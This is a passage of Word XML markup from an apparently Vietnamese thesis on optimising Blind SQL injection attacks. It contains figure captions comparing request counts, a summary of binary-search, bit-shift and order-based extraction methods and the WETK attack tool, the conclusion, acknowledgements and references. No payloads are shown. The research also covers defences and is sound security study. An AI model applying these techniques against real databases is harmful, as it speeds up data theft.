      <w:r w:rsidRPr="00BF48D5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3A521599" wp14:editId="7A13583C">
            <wp:extent cx="4572000" cy="274320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71796" w:rsidRPr="004E7ED7" w:rsidRDefault="00571796" w:rsidP="00313D3F">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:bookmarkStart w:id="130" w:name="_Toc459819465"/>
      <w:r w:rsidRPr="004E7ED7">
        <w:t xml:space="preserve">Hình </w:t>
      </w:r>
      <w:fldSimple w:instr=" STYLEREF 1 \s ">
        <w:r w:rsidR="005F5912">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>3</w:t>
        </w:r>
      </w:fldSimple>
      <w:r w:rsidR="000512EB">
        <w:t>.</w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Hình \* ARABIC \s 1 ">
        <w:r w:rsidR="005F5912">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>24</w:t>
        </w:r>
      </w:fldSimple>
      <w:r w:rsidRPr="004E7ED7">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD584F">
        <w:t xml:space="preserve">Biểu đồ số lượng yêu cầu và thời gian của từng phương pháp (trường hợp độ dài là </w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD584F">
        <w:t>)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="130"/>
    </w:p>
    <w:p w:rsidR="006F59E3" w:rsidRDefault="00571796" w:rsidP="006F59E3">
      <w:pPr>
        <w:keepNext/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00CD584F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5BF79E0B" wp14:editId="4576F51F">
            <wp:extent cx="4572000" cy="34385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71796" w:rsidRPr="006F59E3" w:rsidRDefault="006F59E3" w:rsidP="00313D3F">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:bookmarkStart w:id="131" w:name="_Toc459819466"/>
      <w:r w:rsidRPr="006F59E3">
        <w:t xml:space="preserve">Hình </w:t>
      </w:r>
      <w:fldSimple w:instr=" STYLEREF 1 \s ">
        <w:r w:rsidR="005F5912">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>3</w:t>
        </w:r>
      </w:fldSimple>
      <w:r w:rsidR="000512EB">
        <w:t>.</w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Hình \* ARABIC \s 1 ">
        <w:r w:rsidR="005F5912">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>25</w:t>
        </w:r>
      </w:fldSimple>
      <w:r w:rsidRPr="006F59E3">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00571796" w:rsidRPr="006F59E3">
        <w:t>Biểu đồ số lượng yêu cầu và thời gian của từng phương pháp (trường hợp độ dài là 27)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="131"/>
    </w:p>
    <w:p w:rsidR="00571796" w:rsidRDefault="00571796" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Bằng các số liệu ở trên, phương pháp tấn công dựa trên phân tích số thứ tự cho thấy sự tối ưu vượt trội với các phương pháp khác. Trung bình, phương pháp phân tích thứ tự bằng 1/7 các phương pháp tối ưu khác, và bằng 1/60 với các phương pháp truyền thống. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B16D8E" w:rsidRDefault="00B16D8E" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:tab/>
        <w:t>Trong chương 3 này, luận văn đã trình bày quá trình thực nghiệm lại các phương pháp tối ưu hóa tấn công Blind SQL injection: phương pháp tìm kiếm nhị phân, phương pháp dịch bit, phương pháp phân tích dựa trên thứ tự trả về. Qua đó, làm nổi bật sự tối ưu về mặt số lượng request, thời gian của các phương pháp với nhau cũng như với phương pháp truyền thống. Luận văn cũng trình bày về công cụ tấn công WETK, là tập hợp các mã tấn công được phát triển để phục vụ cho quá trình thực nghiệm này.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00571796" w:rsidRDefault="00571796" w:rsidP="00571796">
      <w:pPr>
        <w:suppressAutoHyphens w:val="0"/>
        <w:spacing w:line="252" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760373" w:rsidRPr="00C93A9C" w:rsidRDefault="0025031B" w:rsidP="00C93A9C">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="132" w:name="_Toc459822526"/>
      <w:r w:rsidRPr="00C93A9C">
        <w:lastRenderedPageBreak/>
        <w:t>KẾT LUẬN</w:t>
      </w:r>
      <w:bookmarkEnd w:id="132"/>
    </w:p>
    <w:p w:rsidR="00760373" w:rsidRDefault="00A20A30" w:rsidP="003633C3">
      <w:pPr>
        <w:suppressAutoHyphens w:val="0"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Từ việc nghiên cứu các về lỗ hổng Blind SQL injection, các phương pháp tấn công phổ biến, luận văn đã đưa ra các kỹ thuật tối ưu hóa tấn công Blind SQL injection, từ đó đưa ra phương pháp phòng chống tấn công SQL injection nói chung, và Blind SQL injection nói riêng trong xây dựng, triển khai hệ thống công nghệ thông tin. </w:t>
      </w:r>
      <w:r w:rsidR="009374A3">
        <w:t>Qua những kết quả thực nghiệm cho thấy các phương pháp tối ưu hóa là hoàn toàn khả thi, có thể áp dụng được trong thực tế, tuy nhiên, mỗi phương pháp đều có những yêu cầu cụ thể, cần nắm rõ các yêu cầu này trong triển khai thực tế.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009374A3" w:rsidRDefault="009374A3" w:rsidP="003633C3">
      <w:pPr>
        <w:suppressAutoHyphens w:val="0"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>Về mặt nội dung, luận văn đã đạt được những nội dung sau:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009374A3" w:rsidRDefault="009374A3" w:rsidP="003633C3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:suppressAutoHyphens w:val="0"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="993" w:hanging="426"/>
      </w:pPr>
      <w:r>
        <w:t>Trình bày về nguyên nhân lỗ hổng SQL injection, Blind SQL injection, phương pháp khai thác cơ bản và cách phòng chống.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009374A3" w:rsidRDefault="009374A3" w:rsidP="003633C3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:suppressAutoHyphens w:val="0"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="993" w:hanging="426"/>
      </w:pPr>
      <w:r>
        <w:t>Nghiên cứu các phương pháp tối ưu hóa tấn công Blind SQL injection đã có trên thế giới, phân tích sâu về phương pháp, cách thực hiện và triển khai các phương pháp này.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009374A3" w:rsidRPr="00C93A9C" w:rsidRDefault="009374A3" w:rsidP="003633C3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:suppressAutoHyphens w:val="0"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="993" w:hanging="426"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Đề xuất một hướng tiếp cận mới trong tối ưu hóa tấn công Blind SQL injection dựa trên phân tích thứ tự nội dung trả về của dữ liệu. Từ đó </w:t>
      </w:r>
      <w:r w:rsidRPr="00C93A9C">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>xây dựng phương pháp, mã tấn công triển khai thực tế.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C93A9C" w:rsidRPr="00C93A9C" w:rsidRDefault="00C93A9C" w:rsidP="00C93A9C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:suppressAutoHyphens w:val="0"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="993" w:hanging="426"/>
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="tr-TR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C93A9C">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="tr-TR"/>
        </w:rPr>
        <w:t xml:space="preserve">Giải pháp phòng chống lỗ hổng SQL injection nói chung và Blind SQL injection nói </w:t>
      </w:r>
      <w:r w:rsidRPr="00C93A9C">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>riêng</w:t>
      </w:r>
      <w:r w:rsidRPr="00C93A9C">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="tr-TR"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009374A3" w:rsidRDefault="009374A3" w:rsidP="003633C3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:suppressAutoHyphens w:val="0"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="993" w:hanging="426"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Xây dựng thực nghiệm kiểm chứng các phương pháp tối ưu hóa đã được trình bày trong luận văn. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009374A3" w:rsidRDefault="009374A3" w:rsidP="003633C3">
      <w:pPr>
        <w:suppressAutoHyphens w:val="0"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00602B3A">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Về định hướng nghiên cứu tiếp theo, l</w:t>
      </w:r>
      <w:r w:rsidR="00602B3A">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>uận văn có thể phát triển theo các hướng sau:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00602B3A" w:rsidRPr="00602B3A" w:rsidRDefault="00602B3A" w:rsidP="003633C3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:suppressAutoHyphens w:val="0"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="993" w:hanging="426"/>
      </w:pPr>
      <w:r w:rsidRPr="00602B3A">
        <w:t xml:space="preserve">Một là nghiên cứu một hướng tiếp cận mới trong phân tích dữ liệu trả về, ngoài dựa trên thứ tự. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00602B3A" w:rsidRPr="00602B3A" w:rsidRDefault="00602B3A" w:rsidP="003633C3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:suppressAutoHyphens w:val="0"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="993" w:hanging="426"/>
      </w:pPr>
      <w:r w:rsidRPr="00602B3A">
        <w:lastRenderedPageBreak/>
        <w:t>Hai là giảm số lượng bản ghi tối thiểu cần có để phân tích được, để có thể áp dụng phương pháp phân tích thứ tự trên trong nhiều trường hợp khác.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00602B3A" w:rsidRPr="00602B3A" w:rsidRDefault="006F4913" w:rsidP="003633C3">
      <w:pPr>
        <w:suppressAutoHyphens w:val="0"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Cuối cùng, e</w:t>
      </w:r>
      <w:r w:rsidRPr="006F4913">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">m xin bày tỏ lòng biết ơn sâu sắc tới </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">thầy giáo TS Đỗ Quang Trung </w:t>
      </w:r>
      <w:r w:rsidRPr="006F4913">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>đã hướng dẫn và có ý kiến chỉ dẫn quý báu trong quá trình em làm luận văn</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="006F4913">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Em cũng xin cảm ơn các thầ</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">y cô giáo trong </w:t>
      </w:r>
      <w:r w:rsidRPr="006F4913">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Khoa</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> An toàn thông tin</w:t>
      </w:r>
      <w:r w:rsidRPr="006F4913">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>, cán bộ</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> trong Học viện Kỹ thuật Mật mã </w:t>
      </w:r>
      <w:r w:rsidRPr="006F4913">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>đã tạo điều kiện trong quá trình học tập</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> và nghiên cứu tại Trường. Em </w:t>
      </w:r>
      <w:r w:rsidRPr="006F4913">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>xin bày tỏ lòng cảm ơn tới những người thân trong gia đình, bạ</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">n bè </w:t>
      </w:r>
      <w:r w:rsidRPr="006F4913">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>đã động viên và giúp đỡ để hoàn thành bản luận văn này.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A20A30" w:rsidRDefault="00A20A30" w:rsidP="003633C3">
      <w:pPr>
        <w:suppressAutoHyphens w:val="0"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A25AB0" w:rsidRPr="00D55C73" w:rsidRDefault="00D55C73" w:rsidP="00C93A9C">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="133" w:name="_Toc459822527"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>TÀI LIỆU THAM KHẢO</w:t>
      </w:r>
      <w:bookmarkEnd w:id="133"/>
    </w:p>
    <w:p w:rsidR="007F31C4" w:rsidRDefault="007F31C4" w:rsidP="00DD02BD">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="28"/>
          <w:lang w:val="tr-TR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="28"/>
          <w:lang w:val="tr-TR"/>
        </w:rPr>
        <w:t>Tiếng Việt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F31C4" w:rsidRDefault="007F31C4" w:rsidP="00DD02BD">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:right="-48" w:firstLine="0"/>
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="tr-TR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001604F9">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="tr-TR"/>
        </w:rPr>
        <w:t>[1] TS Lương Thế</w:t>
      </w:r>
      <w:r w:rsidR="00974F49">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="tr-TR"/>
        </w:rPr>
        <w:t xml:space="preserve"> Dũng </w:t>
      </w:r>
      <w:r w:rsidR="00974F49" w:rsidRPr="001604F9">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="tr-TR"/>
        </w:rPr>
        <w:t>(2010)</w:t>
      </w:r>
      <w:r w:rsidR="00974F49">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="tr-TR"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00974F49" w:rsidRPr="001604F9">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="tr-TR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001604F9">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="tr-TR"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="001604F9">
        <w:rPr>
          <w:i/>
          <w:szCs w:val="28"/>
          <w:lang w:val="tr-TR"/>
        </w:rPr>
        <w:t>Giáo trình An toàn Cơ sở dữ liệu</w:t>
      </w:r>
      <w:r w:rsidRPr="001604F9">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="tr-TR"/>
        </w:rPr>
        <w:t xml:space="preserve">”, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="tr-TR"/>
        </w:rPr>
        <w:t>Học Viện Kỹ Thuật Mậ</w:t>
      </w:r>
      <w:r w:rsidR="00974F49">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="tr-TR"/>
        </w:rPr>
        <w:t>t Mã</w:t>
      </w:r>
      <w:r w:rsidRPr="001604F9">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="tr-TR"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001E10B4" w:rsidRPr="001604F9" w:rsidRDefault="001E10B4" w:rsidP="001E10B4">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="tr-TR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001604F9">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="tr-TR"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="tr-TR"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="001604F9">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="tr-TR"/>
        </w:rPr>
        <w:t xml:space="preserve">] </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="tr-TR"/>
        </w:rPr>
        <w:t>Hà Bách Nam</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="tr-TR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001604F9">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="tr-TR"/>
        </w:rPr>
        <w:t>(201</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="tr-TR"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidRPr="001604F9">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="tr-TR"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="tr-TR"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="001604F9">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="tr-TR"/>
        </w:rPr>
        <w:t xml:space="preserve"> “</w:t>
      </w:r>
      <w:r w:rsidRPr="001E10B4">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="tr-TR"/>
        </w:rPr>
        <w:t>Tối ưu hóa tấn công BLIND SQL INJECTION</w:t>
      </w:r>
      <w:r w:rsidRPr="001604F9">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="tr-TR"/>
        </w:rPr>
        <w:t xml:space="preserve">”, </w:t>
      </w:r>
      <w:r w:rsidR="0014540A" w:rsidRPr="0014540A">
        <w:rPr>
          <w:i/>
          <w:szCs w:val="28"/>
          <w:lang w:val="tr-TR"/>
        </w:rPr>
        <w:t>Tạp chí An toàn thông tin Ban Cơ yếu Chính phủ</w:t>
      </w:r>
      <w:r w:rsidRPr="001604F9">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="tr-TR"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F31C4" w:rsidRDefault="007F31C4" w:rsidP="00DD02BD">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="28"/>
          <w:lang w:val="tr-TR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="28"/>
          <w:lang w:val="tr-TR"/>
        </w:rPr>
        <w:t>Tiếng Anh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0024706B" w:rsidRPr="0024706B" w:rsidRDefault="0024706B" w:rsidP="00DD02BD">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidR="001E10B4">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">] </w:t>
      </w:r>
      <w:r w:rsidRPr="00FD5844">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Daniel Kachakil</w:t>
      </w:r>
      <w:r w:rsidR="00974F49">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> (2013)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>, “</w:t>
      </w:r>
      <w:r w:rsidRPr="00FD5844">
        <w:rPr>
          <w:i/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Fast data extraction using SQL injection and XML statements</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>”, Kacha</w:t>
      </w:r>
      <w:r w:rsidR="00974F49">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>kill.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F31C4" w:rsidRDefault="007F31C4" w:rsidP="00DD02BD">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:right="-48" w:firstLine="0"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidR="001E10B4">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">] </w:t>
      </w:r>
      <w:r w:rsidRPr="005B5457">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Dafydd Stuttard</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005B5457">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Marcus Pinto</w:t>
      </w:r>
      <w:r w:rsidR="00974F49">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> (2011)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>, “</w:t>
      </w:r>
      <w:r w:rsidRPr="005B5457">
        <w:rPr>
          <w:i/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>The Web Application Hacker's Handbook: Finding and Exploiting Security Flaws, 2nd Edition</w:t>
      </w:r>
      <w:r w:rsidR="00974F49">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>”, Wiley.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0024706B" w:rsidRDefault="0024706B" w:rsidP="00DD02BD">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidR="001E10B4">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>] Hanqing Wu</w:t>
      </w:r>
      <w:r w:rsidRPr="002645D4">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Liz Zhao</w:t>
      </w:r>
      <w:r w:rsidR="00974F49">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> (2015)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>, “</w:t>
      </w:r>
      <w:r w:rsidRPr="002645D4">
        <w:rPr>
          <w:i/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Web Security: A WhiteHat Perspective</w:t>
      </w:r>
      <w:r w:rsidR="00974F49">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>”, CRC Press Book.</w:t>
      </w:r>
    </w:p>
